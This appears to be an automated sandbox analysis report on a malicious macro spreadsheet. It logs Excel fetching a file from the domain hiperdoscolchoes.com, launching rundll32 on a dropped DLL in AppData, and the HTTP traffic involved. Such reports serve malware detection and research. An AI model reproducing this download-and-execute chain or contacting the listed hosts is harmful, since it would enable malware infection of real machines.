Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: rundll32 ..\AppData\Roaming\JKER.UUIIKKAA,DllRegisterServer, CommandLine: rundll32 ..\AppData\Roaming\JKER.UUIIKKAA,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6524, ProcessCommandLine: rundll32 ..\AppData\Roaming\JKER.UUIIKKAA,DllRegisterServer, ProcessId: 6004 |
Source: Document_280325456.xlsm | Virustotal: Detection: 11% | Perma Link |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: z: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: x: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: v: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: t: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: r: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: p: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: n: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: l: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: j: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: h: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: f: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: b: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: y: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: w: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: u: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: s: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: q: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: o: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: m: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: k: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: i: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: g: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: e: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: c: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: a: |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA |
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe |
Source: global traffic | DNS query: name: hiperdoscolchoes.com |
Source: global traffic | TCP traffic: 192.168.2.4:49732 -> 173.212.233.8:80 |
Source: global traffic | TCP traffic: 192.168.2.4:49732 -> 173.212.233.8:80 |
Source: global traffic | HTTP traffic detected: GET /demoimg.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hiperdoscolchoes.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /demoimg.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hiperdoscolchoes.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /demoimg.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hiperdoscolchoes.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /demoimg.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hiperdoscolchoes.comConnection: Keep-Alive |
Source: unknown | DNS traffic detected: queries for: hiperdoscolchoes.com |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Jan 2021 20:20:52 GMTServer: ApacheAccept-Ranges: bytesContent-Length: 613Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 76 61 72 20 47 4f 4f 47 5f 46 49 58 55 52 4c 5f 4c 41 4e 47 20 3d 20 27 70 74 2d 50 54 27 3b 0a 20 20 76 61 72 20 47 4f 4f 47 5f 46 49 58 55 52 4c 5f 53 49 54 45 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 64 72 65 61 6d 73 74 6f 72 65 2e 63 6f 6d 2e 70 74 2f 27 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 0a 20 20 20 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 6c 69 6e 6b 68 65 6c 70 2e 63 6c 69 65 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 62 70 72 6f 78 79 2f 6c 68 2f 77 6d 2f 66 69 78 75 72 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 2d 2d 3e 20 0a Data Ascii: <script type="text/javascript"> var GOOG_FIXURL_LANG = 'pt-PT'; var GOOG_FIXURL_SITE = 'http://www.dreamstore.com.pt/';</script><script type="text/javascript" src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script><!-- |